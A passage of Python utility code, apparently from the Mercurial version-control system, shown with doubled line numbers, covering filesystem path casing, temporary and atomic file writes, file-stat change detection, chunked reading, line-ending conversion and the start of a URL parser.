1920 1921 @propertycache
1921 1922 def escape(self):
1922 1923 '''Return the version of escape corresponding to self.compile.
1923 1924
1924 1925 This is imperfect because whether re2 or re is used for a particular
1925 1926 function depends on the flags, etc, but it's the best we can do.
1926 1927 '''
1927 1928 global _re2
1928 1929 if _re2 is None:
1929 1930 self._checkre2()
1930 1931 if _re2:
1931 1932 return re2.escape
1932 1933 else:
1933 1934 return remod.escape
1934 1935
1935 1936 re = _re()
1936 1937
1937 1938 _fspathcache = {}
1938 1939 def fspath(name, root):
1939 1940 '''Get name in the case stored in the filesystem
1940 1941
1941 1942 The name should be relative to root, and be normcase-ed for efficiency.
1942 1943
1943 1944 Note that this function is unnecessary, and should not be
1944 1945 called, for case-sensitive filesystems (simply because it's expensive).
1945 1946
1946 1947 The root should be normcase-ed, too.
1947 1948 '''
1948 1949 def _makefspathcacheentry(dir):
1949 1950 return dict((normcase(n), n) for n in os.listdir(dir))
1950 1951
1951 1952 seps = pycompat.ossep
1952 1953 if pycompat.osaltsep:
1953 1954 seps = seps + pycompat.osaltsep
1954 1955 # Protect backslashes. This gets silly very quickly.
1955 1956 seps.replace('\\','\\\\')
1956 1957 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1957 1958 dir = os.path.normpath(root)
1958 1959 result = []
1959 1960 for part, sep in pattern.findall(name):
1960 1961 if sep:
1961 1962 result.append(sep)
1962 1963 continue
1963 1964
1964 1965 if dir not in _fspathcache:
1965 1966 _fspathcache[dir] = _makefspathcacheentry(dir)
1966 1967 contents = _fspathcache[dir]
1967 1968
1968 1969 found = contents.get(part)
1969 1970 if not found:
1970 1971 # retry "once per directory" per "dirstate.walk" which
1971 1972 # may take place for each patches of "hg qpush", for example
1972 1973 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1973 1974 found = contents.get(part)
1974 1975
1975 1976 result.append(found or part)
1976 1977 dir = os.path.join(dir, part)
1977 1978
1978 1979 return ''.join(result)
1979 1980
1980 1981 def checknlink(testfile):
1981 1982 '''check whether hardlink count reporting works properly'''
1982 1983
1983 1984 # testfile may be open, so we need a separate file for checking to
1984 1985 # work around issue2543 (or testfile may get lost on Samba shares)
1985 1986 f1, f2, fp = None, None, None
1986 1987 try:
1987 1988 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1988 1989 suffix='1~', dir=os.path.dirname(testfile))
1989 1990 os.close(fd)
1990 1991 f2 = '%s2~' % f1[:-2]
1991 1992
1992 1993 oslink(f1, f2)
1993 1994 # nlinks() may behave differently for files on Windows shares if
1994 1995 # the file is open.
1995 1996 fp = posixfile(f2)
1996 1997 return nlinks(f2) > 1
1997 1998 except OSError:
1998 1999 return False
1999 2000 finally:
2000 2001 if fp is not None:
2001 2002 fp.close()
2002 2003 for f in (f1, f2):
2003 2004 try:
2004 2005 if f is not None:
2005 2006 os.unlink(f)
2006 2007 except OSError:
2007 2008 pass
2008 2009
2009 2010 def endswithsep(path):
2010 2011 '''Check path ends with os.sep or os.altsep.'''
2011 2012 return (path.endswith(pycompat.ossep)
2012 2013 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2013 2014
2014 2015 def splitpath(path):
2015 2016 '''Split path by os.sep.
2016 2017 Note that this function does not use os.altsep because this is
2017 2018 an alternative of simple "xxx.split(os.sep)".
2018 2019 It is recommended to use os.path.normpath() before using this
2019 2020 function if need.'''
2020 2021 return path.split(pycompat.ossep)
2021 2022
2022 2023 def mktempcopy(name, emptyok=False, createmode=None):
2023 2024 """Create a temporary file with the same contents from name
2024 2025
2025 2026 The permission bits are copied from the original file.
2026 2027
2027 2028 If the temporary file is going to be truncated immediately, you
2028 2029 can use emptyok=True as an optimization.
2029 2030
2030 2031 Returns the name of the temporary file.
2031 2032 """
2032 2033 d, fn = os.path.split(name)
2033 2034 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2034 2035 os.close(fd)
2035 2036 # Temporary files are created with mode 0600, which is usually not
2036 2037 # what we want. If the original file already exists, just copy
2037 2038 # its mode. Otherwise, manually obey umask.
2038 2039 copymode(name, temp, createmode)
2039 2040 if emptyok:
2040 2041 return temp
2041 2042 try:
2042 2043 try:
2043 2044 ifp = posixfile(name, "rb")
2044 2045 except IOError as inst:
2045 2046 if inst.errno == errno.ENOENT:
2046 2047 return temp
2047 2048 if not getattr(inst, 'filename', None):
2048 2049 inst.filename = name
2049 2050 raise
2050 2051 ofp = posixfile(temp, "wb")
2051 2052 for chunk in filechunkiter(ifp):
2052 2053 ofp.write(chunk)
2053 2054 ifp.close()
2054 2055 ofp.close()
2055 2056 except: # re-raises
2056 2057 try:
2057 2058 os.unlink(temp)
2058 2059 except OSError:
2059 2060 pass
2060 2061 raise
2061 2062 return temp
2062 2063
2063 2064 class filestat(object):
2064 2065 """help to exactly detect change of a file
2065 2066
2066 2067 'stat' attribute is result of 'os.stat()' if specified 'path'
2067 2068 exists. Otherwise, it is None. This can avoid preparative
2068 2069 'exists()' examination on client side of this class.
2069 2070 """
2070 2071 def __init__(self, stat):
2071 2072 self.stat = stat
2072 2073
2073 2074 @classmethod
2074 2075 def frompath(cls, path):
2075 2076 try:
2076 2077 stat = os.stat(path)
2077 2078 except OSError as err:
2078 2079 if err.errno != errno.ENOENT:
2079 2080 raise
2080 2081 stat = None
2081 2082 return cls(stat)
2082 2083
2083 2084 @classmethod
2084 2085 def fromfp(cls, fp):
2085 2086 stat = os.fstat(fp.fileno())
2086 2087 return cls(stat)
2087 2088
2088 2089 __hash__ = object.__hash__
2089 2090
2090 2091 def __eq__(self, old):
2091 2092 try:
2092 2093 # if ambiguity between stat of new and old file is
2093 2094 # avoided, comparison of size, ctime and mtime is enough
2094 2095 # to exactly detect change of a file regardless of platform
2095 2096 return (self.stat.st_size == old.stat.st_size and
2096 2097 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2097 2098 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2098 2099 except AttributeError:
2099 2100 pass
2100 2101 try:
2101 2102 return self.stat is None and old.stat is None
2102 2103 except AttributeError:
2103 2104 return False
2104 2105
2105 2106 def isambig(self, old):
2106 2107 """Examine whether new (= self) stat is ambiguous against old one
2107 2108
2108 2109 "S[N]" below means stat of a file at N-th change:
2109 2110
2110 2111 - S[n-1].ctime < S[n].ctime: can detect change of a file
2111 2112 - S[n-1].ctime == S[n].ctime
2112 2113 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2113 2114 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2114 2115 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2115 2116 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2116 2117
2117 2118 Case (*2) above means that a file was changed twice or more at
2118 2119 same time in sec (= S[n-1].ctime), and comparison of timestamp
2119 2120 is ambiguous.
2120 2121
2121 2122 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2122 2123 timestamp is ambiguous".
2123 2124
2124 2125 But advancing mtime only in case (*2) doesn't work as
2125 2126 expected, because naturally advanced S[n].mtime in case (*1)
2126 2127 might be equal to manually advanced S[n-1 or earlier].mtime.
2127 2128
2128 2129 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2129 2130 treated as ambiguous regardless of mtime, to avoid overlooking
2130 2131 by confliction between such mtime.
2131 2132
2132 2133 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2133 2134 S[n].mtime", even if size of a file isn't changed.
2134 2135 """
2135 2136 try:
2136 2137 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2137 2138 except AttributeError:
2138 2139 return False
2139 2140
2140 2141 def avoidambig(self, path, old):
2141 2142 """Change file stat of specified path to avoid ambiguity
2142 2143
2143 2144 'old' should be previous filestat of 'path'.
2144 2145
2145 2146 This skips avoiding ambiguity, if a process doesn't have
2146 2147 appropriate privileges for 'path'. This returns False in this
2147 2148 case.
2148 2149
2149 2150 Otherwise, this returns True, as "ambiguity is avoided".
2150 2151 """
2151 2152 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2152 2153 try:
2153 2154 os.utime(path, (advanced, advanced))
2154 2155 except OSError as inst:
2155 2156 if inst.errno == errno.EPERM:
2156 2157 # utime() on the file created by another user causes EPERM,
2157 2158 # if a process doesn't have appropriate privileges
2158 2159 return False
2159 2160 raise
2160 2161 return True
2161 2162
2162 2163 def __ne__(self, other):
2163 2164 return not self == other
2164 2165
2165 2166 class atomictempfile(object):
2166 2167 '''writable file object that atomically updates a file
2167 2168
2168 2169 All writes will go to a temporary copy of the original file. Call
2169 2170 close() when you are done writing, and atomictempfile will rename
2170 2171 the temporary copy to the original name, making the changes
2171 2172 visible. If the object is destroyed without being closed, all your
2172 2173 writes are discarded.
2173 2174
2174 2175 checkambig argument of constructor is used with filestat, and is
2175 2176 useful only if target file is guarded by any lock (e.g. repo.lock
2176 2177 or repo.wlock).
2177 2178 '''
2178 2179 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2179 2180 self.__name = name # permanent name
2180 2181 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2181 2182 createmode=createmode)
2182 2183 self._fp = posixfile(self._tempname, mode)
2183 2184 self._checkambig = checkambig
2184 2185
2185 2186 # delegated methods
2186 2187 self.read = self._fp.read
2187 2188 self.write = self._fp.write
2188 2189 self.seek = self._fp.seek
2189 2190 self.tell = self._fp.tell
2190 2191 self.fileno = self._fp.fileno
2191 2192
2192 2193 def close(self):
2193 2194 if not self._fp.closed:
2194 2195 self._fp.close()
2195 2196 filename = localpath(self.__name)
2196 2197 oldstat = self._checkambig and filestat.frompath(filename)
2197 2198 if oldstat and oldstat.stat:
2198 2199 rename(self._tempname, filename)
2199 2200 newstat = filestat.frompath(filename)
2200 2201 if newstat.isambig(oldstat):
2201 2202 # stat of changed file is ambiguous to original one
2202 2203 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2203 2204 os.utime(filename, (advanced, advanced))
2204 2205 else:
2205 2206 rename(self._tempname, filename)
2206 2207
2207 2208 def discard(self):
2208 2209 if not self._fp.closed:
2209 2210 try:
2210 2211 os.unlink(self._tempname)
2211 2212 except OSError:
2212 2213 pass
2213 2214 self._fp.close()
2214 2215
2215 2216 def __del__(self):
2216 2217 if safehasattr(self, '_fp'): # constructor actually did something
2217 2218 self.discard()
2218 2219
2219 2220 def __enter__(self):
2220 2221 return self
2221 2222
2222 2223 def __exit__(self, exctype, excvalue, traceback):
2223 2224 if exctype is not None:
2224 2225 self.discard()
2225 2226 else:
2226 2227 self.close()
2227 2228
2228 2229 def unlinkpath(f, ignoremissing=False, rmdir=True):
2229 2230 """unlink and remove the directory if it is empty"""
2230 2231 if ignoremissing:
2231 2232 tryunlink(f)
2232 2233 else:
2233 2234 unlink(f)
2234 2235 if rmdir:
2235 2236 # try removing directories that might now be empty
2236 2237 try:
2237 2238 removedirs(os.path.dirname(f))
2238 2239 except OSError:
2239 2240 pass
2240 2241
2241 2242 def tryunlink(f):
2242 2243 """Attempt to remove a file, ignoring ENOENT errors."""
2243 2244 try:
2244 2245 unlink(f)
2245 2246 except OSError as e:
2246 2247 if e.errno != errno.ENOENT:
2247 2248 raise
2248 2249
2249 2250 def makedirs(name, mode=None, notindexed=False):
2250 2251 """recursive directory creation with parent mode inheritance
2251 2252
2252 2253 Newly created directories are marked as "not to be indexed by
2253 2254 the content indexing service", if ``notindexed`` is specified
2254 2255 for "write" mode access.
2255 2256 """
2256 2257 try:
2257 2258 makedir(name, notindexed)
2258 2259 except OSError as err:
2259 2260 if err.errno == errno.EEXIST:
2260 2261 return
2261 2262 if err.errno != errno.ENOENT or not name:
2262 2263 raise
2263 2264 parent = os.path.dirname(os.path.abspath(name))
2264 2265 if parent == name:
2265 2266 raise
2266 2267 makedirs(parent, mode, notindexed)
2267 2268 try:
2268 2269 makedir(name, notindexed)
2269 2270 except OSError as err:
2270 2271 # Catch EEXIST to handle races
2271 2272 if err.errno == errno.EEXIST:
2272 2273 return
2273 2274 raise
2274 2275 if mode is not None:
2275 2276 os.chmod(name, mode)
2276 2277
2277 2278 def readfile(path):
2278 2279 with open(path, 'rb') as fp:
2279 2280 return fp.read()
2280 2281
2281 2282 def writefile(path, text):
2282 2283 with open(path, 'wb') as fp:
2283 2284 fp.write(text)
2284 2285
2285 2286 def appendfile(path, text):
2286 2287 with open(path, 'ab') as fp:
2287 2288 fp.write(text)
2288 2289
2289 2290 class chunkbuffer(object):
2290 2291 """Allow arbitrary sized chunks of data to be efficiently read from an
2291 2292 iterator over chunks of arbitrary size."""
2292 2293
2293 2294 def __init__(self, in_iter):
2294 2295 """in_iter is the iterator that's iterating over the input chunks."""
2295 2296 def splitbig(chunks):
2296 2297 for chunk in chunks:
2297 2298 if len(chunk) > 2**20:
2298 2299 pos = 0
2299 2300 while pos < len(chunk):
2300 2301 end = pos + 2 ** 18
2301 2302 yield chunk[pos:end]
2302 2303 pos = end
2303 2304 else:
2304 2305 yield chunk
2305 2306 self.iter = splitbig(in_iter)
2306 2307 self._queue = collections.deque()
2307 2308 self._chunkoffset = 0
2308 2309
2309 2310 def read(self, l=None):
2310 2311 """Read L bytes of data from the iterator of chunks of data.
2311 2312 Returns less than L bytes if the iterator runs dry.
2312 2313
2313 2314 If size parameter is omitted, read everything"""
2314 2315 if l is None:
2315 2316 return ''.join(self.iter)
2316 2317
2317 2318 left = l
2318 2319 buf = []
2319 2320 queue = self._queue
2320 2321 while left > 0:
2321 2322 # refill the queue
2322 2323 if not queue:
2323 2324 target = 2**18
2324 2325 for chunk in self.iter:
2325 2326 queue.append(chunk)
2326 2327 target -= len(chunk)
2327 2328 if target <= 0:
2328 2329 break
2329 2330 if not queue:
2330 2331 break
2331 2332
2332 2333 # The easy way to do this would be to queue.popleft(), modify the
2333 2334 # chunk (if necessary), then queue.appendleft(). However, for cases
2334 2335 # where we read partial chunk content, this incurs 2 dequeue
2335 2336 # mutations and creates a new str for the remaining chunk in the
2336 2337 # queue. Our code below avoids this overhead.
2337 2338
2338 2339 chunk = queue[0]
2339 2340 chunkl = len(chunk)
2340 2341 offset = self._chunkoffset
2341 2342
2342 2343 # Use full chunk.
2343 2344 if offset == 0 and left >= chunkl:
2344 2345 left -= chunkl
2345 2346 queue.popleft()
2346 2347 buf.append(chunk)
2347 2348 # self._chunkoffset remains at 0.
2348 2349 continue
2349 2350
2350 2351 chunkremaining = chunkl - offset
2351 2352
2352 2353 # Use all of unconsumed part of chunk.
2353 2354 if left >= chunkremaining:
2354 2355 left -= chunkremaining
2355 2356 queue.popleft()
2356 2357 # offset == 0 is enabled by block above, so this won't merely
2357 2358 # copy via ``chunk[0:]``.
2358 2359 buf.append(chunk[offset:])
2359 2360 self._chunkoffset = 0
2360 2361
2361 2362 # Partial chunk needed.
2362 2363 else:
2363 2364 buf.append(chunk[offset:offset + left])
2364 2365 self._chunkoffset += left
2365 2366 left -= chunkremaining
2366 2367
2367 2368 return ''.join(buf)
2368 2369
2369 2370 def filechunkiter(f, size=131072, limit=None):
2370 2371 """Create a generator that produces the data in the file size
2371 2372 (default 131072) bytes at a time, up to optional limit (default is
2372 2373 to read all data). Chunks may be less than size bytes if the
2373 2374 chunk is the last chunk in the file, or the file is a socket or
2374 2375 some other type of file that sometimes reads less data than is
2375 2376 requested."""
2376 2377 assert size >= 0
2377 2378 assert limit is None or limit >= 0
2378 2379 while True:
2379 2380 if limit is None:
2380 2381 nbytes = size
2381 2382 else:
2382 2383 nbytes = min(limit, size)
2383 2384 s = nbytes and f.read(nbytes)
2384 2385 if not s:
2385 2386 break
2386 2387 if limit:
2387 2388 limit -= len(s)
2388 2389 yield s
2389 2390
2390 2391 class cappedreader(object):
2391 2392 """A file object proxy that allows reading up to N bytes.
2392 2393
2393 2394 Given a source file object, instances of this type allow reading up to
2394 2395 N bytes from that source file object. Attempts to read past the allowed
2395 2396 limit are treated as EOF.
2396 2397
2397 2398 It is assumed that I/O is not performed on the original file object
2398 2399 in addition to I/O that is performed by this instance. If there is,
2399 2400 state tracking will get out of sync and unexpected results will ensue.
2400 2401 """
2401 2402 def __init__(self, fh, limit):
2402 2403 """Allow reading up to <limit> bytes from <fh>."""
2403 2404 self._fh = fh
2404 2405 self._left = limit
2405 2406
2406 2407 def read(self, n=-1):
2407 2408 if not self._left:
2408 2409 return b''
2409 2410
2410 2411 if n < 0:
2411 2412 n = self._left
2412 2413
2413 2414 data = self._fh.read(min(n, self._left))
2414 2415 self._left -= len(data)
2415 2416 assert self._left >= 0
2416 2417
2417 2418 return data
2418 2419
2419 2420 def readinto(self, b):
2420 2421 res = self.read(len(b))
2421 2422 if res is None:
2422 2423 return None
2423 2424
2424 2425 b[0:len(res)] = res
2425 2426 return len(res)
2426 2427
2427 2428 def unitcountfn(*unittable):
2428 2429 '''return a function that renders a readable count of some quantity'''
2429 2430
2430 2431 def go(count):
2431 2432 for multiplier, divisor, format in unittable:
2432 2433 if abs(count) >= divisor * multiplier:
2433 2434 return format % (count / float(divisor))
2434 2435 return unittable[-1][2] % count
2435 2436
2436 2437 return go
2437 2438
2438 2439 def processlinerange(fromline, toline):
2439 2440 """Check that linerange <fromline>:<toline> makes sense and return a
2440 2441 0-based range.
2441 2442
2442 2443 >>> processlinerange(10, 20)
2443 2444 (9, 20)
2444 2445 >>> processlinerange(2, 1)
2445 2446 Traceback (most recent call last):
2446 2447 ...
2447 2448 ParseError: line range must be positive
2448 2449 >>> processlinerange(0, 5)
2449 2450 Traceback (most recent call last):
2450 2451 ...
2451 2452 ParseError: fromline must be strictly positive
2452 2453 """
2453 2454 if toline - fromline < 0:
2454 2455 raise error.ParseError(_("line range must be positive"))
2455 2456 if fromline < 1:
2456 2457 raise error.ParseError(_("fromline must be strictly positive"))
2457 2458 return fromline - 1, toline
2458 2459
2459 2460 bytecount = unitcountfn(
2460 2461 (100, 1 << 30, _('%.0f GB')),
2461 2462 (10, 1 << 30, _('%.1f GB')),
2462 2463 (1, 1 << 30, _('%.2f GB')),
2463 2464 (100, 1 << 20, _('%.0f MB')),
2464 2465 (10, 1 << 20, _('%.1f MB')),
2465 2466 (1, 1 << 20, _('%.2f MB')),
2466 2467 (100, 1 << 10, _('%.0f KB')),
2467 2468 (10, 1 << 10, _('%.1f KB')),
2468 2469 (1, 1 << 10, _('%.2f KB')),
2469 2470 (1, 1, _('%.0f bytes')),
2470 2471 )
2471 2472
2472 2473 class transformingwriter(object):
2473 2474 """Writable file wrapper to transform data by function"""
2474 2475
2475 2476 def __init__(self, fp, encode):
2476 2477 self._fp = fp
2477 2478 self._encode = encode
2478 2479
2479 2480 def close(self):
2480 2481 self._fp.close()
2481 2482
2482 2483 def flush(self):
2483 2484 self._fp.flush()
2484 2485
2485 2486 def write(self, data):
2486 2487 return self._fp.write(self._encode(data))
2487 2488
2488 2489 # Matches a single EOL which can either be a CRLF where repeated CR
2489 2490 # are removed or a LF. We do not care about old Macintosh files, so a
2490 2491 # stray CR is an error.
2491 2492 _eolre = remod.compile(br'\r*\n')
2492 2493
2493 2494 def tolf(s):
2494 2495 return _eolre.sub('\n', s)
2495 2496
2496 2497 def tocrlf(s):
2497 2498 return _eolre.sub('\r\n', s)
2498 2499
2499 2500 def _crlfwriter(fp):
2500 2501 return transformingwriter(fp, tocrlf)
2501 2502
2502 2503 if pycompat.oslinesep == '\r\n':
2503 2504 tonativeeol = tocrlf
2504 2505 fromnativeeol = tolf
2505 2506 nativeeolwriter = _crlfwriter
2506 2507 else:
2507 2508 tonativeeol = pycompat.identity
2508 2509 fromnativeeol = pycompat.identity
2509 2510 nativeeolwriter = pycompat.identity
2510 2511
2511 2512 if (pyplatform.python_implementation() == 'CPython' and
2512 2513 sys.version_info < (3, 0)):
2513 2514 # There is an issue in CPython that some IO methods do not handle EINTR
2514 2515 # correctly. The following table shows what CPython version (and functions)
2515 2516 # are affected (buggy: has the EINTR bug, okay: otherwise):
2516 2517 #
2517 2518 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2518 2519 # --------------------------------------------------
2519 2520 # fp.__iter__ | buggy | buggy | okay
2520 2521 # fp.read* | buggy | okay [1] | okay
2521 2522 #
2522 2523 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2523 2524 #
2524 2525 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2525 2526 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2526 2527 #
2527 2528 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2528 2529 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2529 2530 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2530 2531 # fp.__iter__ but not other fp.read* methods.
2531 2532 #
2532 2533 # On modern systems like Linux, the "read" syscall cannot be interrupted
2533 2534 # when reading "fast" files like on-disk files. So the EINTR issue only
2534 2535 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2535 2536 # files approximately as "fast" files and use the fast (unsafe) code path,
2536 2537 # to minimize the performance impact.
2537 2538 if sys.version_info >= (2, 7, 4):
2538 2539 # fp.readline deals with EINTR correctly, use it as a workaround.
2539 2540 def _safeiterfile(fp):
2540 2541 return iter(fp.readline, '')
2541 2542 else:
2542 2543 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2543 2544 # note: this may block longer than necessary because of bufsize.
2544 2545 def _safeiterfile(fp, bufsize=4096):
2545 2546 fd = fp.fileno()
2546 2547 line = ''
2547 2548 while True:
2548 2549 try:
2549 2550 buf = os.read(fd, bufsize)
2550 2551 except OSError as ex:
2551 2552 # os.read only raises EINTR before any data is read
2552 2553 if ex.errno == errno.EINTR:
2553 2554 continue
2554 2555 else:
2555 2556 raise
2556 2557 line += buf
2557 2558 if '\n' in buf:
2558 2559 splitted = line.splitlines(True)
2559 2560 line = ''
2560 2561 for l in splitted:
2561 2562 if l[-1] == '\n':
2562 2563 yield l
2563 2564 else:
2564 2565 line = l
2565 2566 if not buf:
2566 2567 break
2567 2568 if line:
2568 2569 yield line
2569 2570
2570 2571 def iterfile(fp):
2571 2572 fastpath = True
2572 2573 if type(fp) is file:
2573 2574 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2574 2575 if fastpath:
2575 2576 return fp
2576 2577 else:
2577 2578 return _safeiterfile(fp)
2578 2579 else:
2579 2580 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2580 2581 def iterfile(fp):
2581 2582 return fp
2582 2583
2583 2584 def iterlines(iterator):
2584 2585 for chunk in iterator:
2585 2586 for line in chunk.splitlines():
2586 2587 yield line
2587 2588
2588 2589 def expandpath(path):
2589 2590 return os.path.expanduser(os.path.expandvars(path))
2590 2591
2591 2592 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2592 2593 """Return the result of interpolating items in the mapping into string s.
2593 2594
2594 2595 prefix is a single character string, or a two character string with
2595 2596 a backslash as the first character if the prefix needs to be escaped in
2596 2597 a regular expression.
2597 2598
2598 2599 fn is an optional function that will be applied to the replacement text
2599 2600 just before replacement.
2600 2601
2601 2602 escape_prefix is an optional flag that allows using doubled prefix for
2602 2603 its escaping.
2603 2604 """
2604 2605 fn = fn or (lambda s: s)
2605 2606 patterns = '|'.join(mapping.keys())
2606 2607 if escape_prefix:
2607 2608 patterns += '|' + prefix
2608 2609 if len(prefix) > 1:
2609 2610 prefix_char = prefix[1:]
2610 2611 else:
2611 2612 prefix_char = prefix
2612 2613 mapping[prefix_char] = prefix_char
2613 2614 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2614 2615 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2615 2616
2616 2617 def getport(port):
2617 2618 """Return the port for a given network service.
2618 2619
2619 2620 If port is an integer, it's returned as is. If it's a string, it's
2620 2621 looked up using socket.getservbyname(). If there's no matching
2621 2622 service, error.Abort is raised.
2622 2623 """
2623 2624 try:
2624 2625 return int(port)
2625 2626 except ValueError:
2626 2627 pass
2627 2628
2628 2629 try:
2629 2630 return socket.getservbyname(pycompat.sysstr(port))
2630 2631 except socket.error:
2631 2632 raise error.Abort(_("no port number associated with service '%s'")
2632 2633 % port)
2633 2634
2634 2635 class url(object):
2635 2636 r"""Reliable URL parser.
2636 2637
2637 2638 This parses URLs and provides attributes for the following
2638 2639 components:
2639 2640
2640 2641 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2641 2642
2642 2643 Missing components are set to None. The only exception is
2643 2644 fragment, which is set to '' if present but empty.
2644 2645
2645 2646 If parsefragment is False, fragment is included in query. If
2646 2647 parsequery is False, query is included in path. If both are
2647 2648 False, both fragment and query are included in path.
2648 2649
2649 2650 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2650 2651
2651 2652 Note that for backward compatibility reasons, bundle URLs do not
2652 2653 take host names. That means 'bundle://../' has a path of '../'.
2653 2654
2654 2655 Examples:
2655 2656
2656 2657 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2657 2658 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2658 2659 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2659 2660 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2660 2661 >>> url(b'file:///home/joe/repo')
2661 2662 <url scheme: 'file', path: '/home/joe/repo'>
2662 2663 >>> url(b'file:///c:/temp/foo/')
2663 2664 <url scheme: 'file', path: 'c:/temp/foo/'>
2664 2665 >>> url(b'bundle:foo')
2665 2666 <url scheme: 'bundle', path: 'foo'>
2666 2667 >>> url(b'bundle://../foo')
2667 2668 <url scheme: 'bundle', path: '../foo'>
2668 2669 >>> url(br'c:\foo\bar')
2669 2670 <url path: 'c:\\foo\\bar'>
2670 2671 >>> url(br'\\blah\blah\blah')
2671 2672 <url path: '\\\\blah\\blah\\blah'>
2672 2673 >>> url(br'\\blah\blah\blah#baz')
2673 2674 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2674 2675 >>> url(br'file:///C:\users\me')
2675 2676 <url scheme: 'file', path: 'C:\\users\\me'>
2676 2677
2677 2678 Authentication credentials:
2678 2679
2679 2680 >>> url(b'ssh://joe:xyz@x/repo')
2680 2681 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2681 2682 >>> url(b'ssh://joe@x/repo')
2682 2683 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2683 2684
2684 2685 Query strings and fragments:
2685 2686
2686 2687 >>> url(b'http://host/a?b#c')
2687 2688 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2688 2689 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2689 2690 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2690 2691
2691 2692 Empty path:
2692 2693
2693 2694 >>> url(b'')
2694 2695 <url path: ''>
2695 2696 >>> url(b'#a')
2696 2697 <url path: '', fragment: 'a'>
2697 2698 >>> url(b'http://host/')
2698 2699 <url scheme: 'http', host: 'host', path: ''>
2699 2700 >>> url(b'http://host/#a')
2700 2701 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2701 2702
2702 2703 Only scheme:
2703 2704
2704 2705 >>> url(b'http:')
2705 2706 <url scheme: 'http'>
2706 2707 """
2707 2708
2708 2709 _safechars = "!~*'()+"
2709 2710 _safepchars = "/!~*'()+:\\"
2710 2711 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2711 2712
2712 2713 def __init__(self, path, parsequery=True, parsefragment=True):
2713 2714 # We slowly chomp away at path until we have only the path left
2714 2715 self.scheme = self.user = self.passwd = self.host = None
2715 2716 self.port = self.path = self.query = self.fragment = None
2716 2717 self._localpath = True
2717 2718 self._hostport = ''
2718 2719 self._origpath = path
2719 2720
2720 2721 if parsefragment and '#' in path:
2721 2722 path, self.fragment = path.split('#', 1)
2722 2723
2723 2724 # special case for Windows drive letters and UNC paths
2724 2725 if hasdriveletter(path) or path.startswith('\\\\'):
2725 2726 self.path = path
2726 2727 return
2727 2728
2728 2729 # For compatibility reasons, we can't handle bundle paths as
2729 2730 # normal URLS
2730 2731 if path.startswith('bundle:'):
2731 2732 self.scheme = 'bundle'
2732 2733 path = path[7:]
2733 2734 if path.startswith('//'):
2734 2735 path = path[2:]
2735 2736 self.path = path
2736 2737 return
2737 2738
2738 2739 if self._matchscheme(path):
2739 2740 parts = path.split(':', 1)
2740 2741 if parts[0]:
2741 2742 self.scheme, path = parts
2742 2743 self._localpath = False
2743 2744
2744 2745 if not path:
2745 2746 path = None
2746 2747 if self._localpath:
2747 2748 self.path = ''
2748 2749 return
2749 2750 else:
2750 2751 if self._localpath:
2751 2752 self.path = path
2752 2753 return
2753 2754
2754 2755 if parsequery and '?' in path:
2755 2756 path, self.query = path.split('?', 1)
2756 2757 if not path:
2757 2758 path = None
2758 2759 if not self.query:
2759 2760 self.query = None
2760 2761
2761 2762 # // is required to specify a host/authority
2762 2763 if path and path.startswith('//'):
2763 2764 parts = path[2:].split('/', 1)
2764 2765 if len(parts) > 1:
2765 2766 self.host, path = parts
2766 2767 else:
2767 2768 self.host = parts[0]
2768 2769 path = None
2769 2770 if not self.host:
2770 2771 self.host = None
2771 2772 # path of file:///d is /d
2772 2773 # path of file:///d:/ is d:/, not /d:/
2773 2774 if path and not hasdriveletter(path):
2774 2775 path = '/' + path
2775 2776
2776 2777 if self.host and '@' in self.host:
2777 2778 self.user, self.host = self.host.rsplit('@', 1)
2778 2779 if ':' in self.user:
2779 2780 self.user, self.passwd = self.user.split(':', 1)
2780 2781 if not self.host:
2781 2782 self.host = None
2782 2783
2783 2784 # Don't split on colons in IPv6 addresses without ports
